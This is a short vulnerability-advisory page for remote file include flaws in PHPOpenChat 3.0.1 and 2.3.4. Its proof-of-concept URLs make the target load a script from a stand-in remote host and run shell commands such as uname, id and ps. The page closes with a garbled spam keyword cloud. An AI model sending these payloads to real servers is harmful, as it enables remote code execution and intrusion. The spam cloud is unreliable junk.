about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPOpenChat Multiple Remote File Include Vulnerabilities


Title PHPOpenChat Multiple Remote File Include Vulnerabilities
Published 2005-03-15-12:00AM
Updated 2005-03-15-11:14PM
Class Input Validation Error
CVE   CAN-2005-0862
Remote  Yes
Local  No
Credit  Discovery is credited to Albania Security Clan.
Vulnerable  PHPOpenChat PHPOpenChat 3.0.1
PHPOpenChat PHPOpenChat 2.3.4
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 17:46:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
kiran sexy document Hollywoods spgm www.sztwt. Hollywoods www.3653h. ray wwwsexlk proftpd 1. Crack+Data news for c www.ibmfoc Free wap4s CONDOM SMF 1.1.1 whckey.5d6 com_ponyga 4507R +...t%252F tribal war pre teens Videox trisa sexs www.sexcom ana paula animai por www.pynfw. bluequartz phpBB ? 20 phpbb port www.lexsen www.yw139. www.sexcom Www.3733.c Articles www.sexcom php-nuke 2 sources/te WORLDSEXCO xxx girl /data/vuln Hotsexvide maxcpm.inf Www themls www.malawa www.52wwz. Video boke ftps Bim2